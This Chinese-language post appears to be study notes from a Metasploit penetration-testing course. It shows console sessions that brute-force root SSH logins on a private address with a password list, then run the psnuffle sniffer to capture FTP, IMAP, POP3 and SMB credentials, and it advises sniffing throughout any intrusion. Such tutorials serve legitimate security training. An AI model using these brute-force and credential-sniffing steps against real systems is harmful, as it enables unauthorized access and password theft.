MSF魔鬼训练营-3.3.2 口令猜测与嗅探
Posted EnderZhou
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MSF魔鬼训练营-3.3.2 口令猜测与嗅探相关的知识,希望对你有一定的参考价值。
密码暴力破解以SSH为例,其他协议方法类似
SSH
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.3.199
rhosts => 192.168.3.199
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set pass_file /root/pass.txt
pass_file => /root/pass.txt
msf auxiliary(ssh_login) > set threads 100
threads => 100
msf auxiliary(ssh_login) > run
[*] SSH - Starting bruteforce
[-] SSH - Failed: ‘root:19500101an‘
[-] SSH - Failed: ‘root:19500101ba‘
[-] SSH - Failed: ‘root:19500101bai‘
[-] SSH - Failed: ‘root:19500101ban‘
[-] SSH - Failed: ‘root:19500101bao‘
[-] SSH - Failed: ‘root:19500101bei‘
[-] SSH - Failed: ‘root:19500101bi‘
[-] SSH - Failed: ‘root:19500101bian‘
在计入对方网络的初始访问点后才能够方便的使用psnuffle模块进行口令嗅探。条件允许的话再介入网络的整个过程都要保持嗅探器的运行。增加截获口令的可能性。
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > show options
Module options (auxiliary/sniffer/psnuffle):
Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PROTOCOLS all yes A comma-delimited list of protocols to sniff or "all".
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 500 yes The number of seconds to wait for new data
Auxiliary action:
Name Description
---- -----------
Sniffer
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
msf auxiliary(psnuffle) >
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
以上是关于MSF魔鬼训练营-3.3.2 口令猜测与嗅探的主要内容,如果未能解决你的问题,请参考以下文章
MSF魔鬼训练营-3.1.1信息收集-通过DNS和IP地址挖掘目标网络信息